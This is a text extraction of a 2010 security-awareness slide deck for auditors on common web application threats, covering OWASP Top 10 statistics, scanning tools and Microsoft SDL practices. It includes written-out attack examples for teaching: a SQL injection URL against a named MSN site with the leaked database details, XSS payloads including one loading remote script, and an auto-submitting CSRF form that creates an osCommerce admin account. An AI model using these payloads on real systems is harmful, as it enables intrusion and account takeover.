Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
Securing Your Company’s Web Presence
Securing Your Company’s Web Presence Russ McRee Microsoft
Holisticinfosec.org
Russ McRee Microsoft
Holisticinfosec.org
ISACA Puget Sound Meeting
3/16/2010
Common security threats to your web presence & what you can do
about it
Common security threats to your web presence & what you can do
about it
Securing your company’s web presence
• Understand the current state of security in the Web 2.0 world
• Common vulnerabilities and how easily hackers can exploit them
• Review common tools available for developers, auditors, managers, & security assessors
• Utilize frameworks (such as OWASP) to assess and prevent common vulnerabilities
AGENDA
State of the Web 2.0 Union
• 83% of websites have had at least one serious vulnerability
• 64% of websites currently have at least one serious vulnerability
• 61% vulnerability resolution-rate with 8,902 unresolved issues remaining (39%)
• Average # of serious severity unresolved vulnerabilities per website: 6.5
Source: WhiteHat Security
State of the Web 2.0 Union State of the Web 2.0 Union
State of the Web 2.0 Union
• Web malware – Gumblar
• Gumblar is a botnet that infects Web servers and infected Web site visitors for the purposes of installing malcode on Personal Computers (PCs) that redirects end-user Google searches to fraudulent Web sites. Also looks for FTP credentials on the PC and may use them to compromise additional Web sites
• Malicious online advertisements – Malicious advertisers purchase ad time in online streams
or compromise existing aggregators
Source: WhiteHat Security
Common vulns and ease of exploit
Source: OWASP Top 10
Common vulns and ease of exploit
2010 CWE/SANS Top 25 Most Dangerous Programming Errors
Common vulns and ease of exploit
• Injection
– SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part
of a command or query.
– The attacker’s hostile data can trick the
interpreter into executing unintended
commands or accessing unauthorized data.
Source: OWASP Top 10
Common vulns and ease of exploit Common vulns and ease of exploit
• SQL injection
– Good:
• http://festivalbar.it.msn.com/news/index.p
hp?id=2
– Not good at all:
• http://festivalbar.it.msn.com/news/index.p
hp?id=-1 union select
1,concat_ws(0x3a,user(),@@version,data
base()),3,4,5,6,7,8,9,10,11—
– User = FBAR_FB002
– Host private IP = 192.168.111.119
– MySQL version = 4.1.22
– Database = FBAR_WWW
Common vulns and ease of exploit
SQL injection video demo
festivalbar.it.msn.com
Common vulns and ease of exploit
• Cross-site scripting (XSS)
– XSS flaws occur whenever an application
takes untrusted data and sends it to a web
browser without proper validation and
escaping
– XSS allows attackers to execute script in the
victim’s browser which can hijack user
sessions, deface web sites, or redirect the
user to malicious sites
Source: OWASP Top 10
Common vulns and ease of exploit Common vulns and ease of exploit
• Cross-site scripting (XSS)
– Good
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b604491e163632
– Bad
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script>alert(document.cookie)</script>4491e163632
– Really bad
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script src=http://holisticinfosec.org/js/warning.js></script>4491e163632
Common vulns and ease of exploit
XSS video demo
eclime 1.0.9b (osCommerce fork)
Common vulns and ease of exploit
• Cross-site request forgery (CSRF)
– A CSRF attack forces a logged-on victim’s browser to
send a forged HTTP request, including the victim’s
session cookie and any other authentication information,
to a vulnerable web application
– This allows the attacker to force the victim’s browser to
generate requests the vulnerable application thinks are
legitimate requests from the victim
Source: OWASP Top 10
Common vulns and ease of exploit Common vulns and ease of exploit
• Cross-site request forgery
<html>
<form name="createID"
action="http://192.168.248.102/oscommerce/catalog/admin/administ
rators.php?action=insert" method=Post AUTOCOMPLETE="off">
<input type="hidden" name="username" value="frank">
<input type="hidden" name="password" value="test">
<input type="hidden" name="x" value="">
<input type="hidden" name="y" value="">
</form>
<script>
window.setTimeout(function() {
document.createID.submit();
}, 3000);
</script>
<h1>Adding an osCommerce admin user...</h1>
</html>
Common vulns and ease of exploit
CSRF video demo
osCommerce
Common tools – commercial Common tools – commercial
• Acunetix WVS by Acunetix
• AppScan by IBM
• Burp Suite Professional by PortSwigger
• Hailstorm by Cenzic
• MileScan Web Security Auditor by MileSCAN Technologies
• N-Stalker by N-Stalker
• NetSparker by Mavituna Security
• NeXpose by Rapid7
• NTOSpider by NTObjectives
• Retina Web Security Scanner by eEye Digital Security
• SecurityQA Toolbar by iSEC Partners
• WebApp360 by nCircle
• WebInspect by HP
Source: WASC Scanner List Tools I’ve used
Common tools - Saas Common tools - Saas
• AppScan OnDemand by IBM
• ClickToSecure by Cenzic
• QualysGuard Web Application Scanning
by Qualys
• Sentinel by WhiteHat
• Veracode Web Application Security by
Veracode
• WebInspect by HP
Source: WASC Scanner List Tools I’ve used
Common tools – Free/Open Source Common tools – Free/Open Source
• Burp Suite by PortSwigger
• Grabber by Romain Gaucher
• Grendel-Scan by David Byrne and Eric Duprey
• Nikto/Wikto
• Paros by Chinotec
• Powerfuzzer by Marcin Kozlowski
• SecurityQA Toolbar by iSEC Partners
• TamperData
• W3AF by Andres Riancho
• Wapiti by Nicolas Surribas
• Watcher & Fiddler
Source: WASC Scanner List Tools I’ve used
Tools – Burp & Tamper Data Tools – Burp & Tamper Data
Burp or
Tamper Data demo
Frameworks
• Audit against OWASP Top 10 and CWE/SANS Top 25
• Now balance that those against compliance requirements
• You’re the auditors, you tell me ;-) – PCI
– HIPAA
– SOX
– GLBA
Frameworks
• Security Development Lifecycle (SDL) – Incorporates comprehensive security and privacy
protections for online services and Web applications. Includes requirements that address widely exploited classes of Web vulnerabilities, including XSS, SQL injection, and CSRF among others.
• Applies to large, medium and small organizations
• Applies to various development methodologies
• Applies to any platform
Frameworks
• SDL Threat Modeling – Classic software threat modeling
– Infrastructure threat modeling
Resources Resources
• OWASP Top 10
– http://www.owasp.org/index.php/Category:O
WASP_Top_Ten_Project
• 2010 CWE/SANS Top 25 Most
Dangerous Programming Errors
– http://cwe.mitre.org/top25/
• 8th WhiteHat Website Security Statistic
Report
– http://www.slideshare.net/jeremiahgrossman/
whitehat-security-8th-website-security-
statistics-report-2494163
Resources Resources
• SDL
– http://www.microsoft.com/security/sdl/default.
aspx
• Infrastructure Threat Modeling
– http://technet.microsoft.com/en-
us/library/dd941826.aspx
• SDL Threat Modeling Tool
– http://www.microsoft.com/downloads/details.
aspx?FamilyID=A48CCCB1-814B-47B6-
9D17-1E273F65AE19&displayLang=en
• Toolsmith
– http://holisticinfosec.org/content/view/12/26/
Resources Resources
• WebGoat
– http://www.owasp.org/index.php/Category:O
WASP_WebGoat_Project
Russ McRee russ at holisticinfosec dot org
rmcree at microsoft dot com
Russ McRee russ at holisticinfosec dot org
rmcree at microsoft dot com
ISACA Puget Sound Meeting
3/16/2010
QUESTIONS?
QUESTIONS?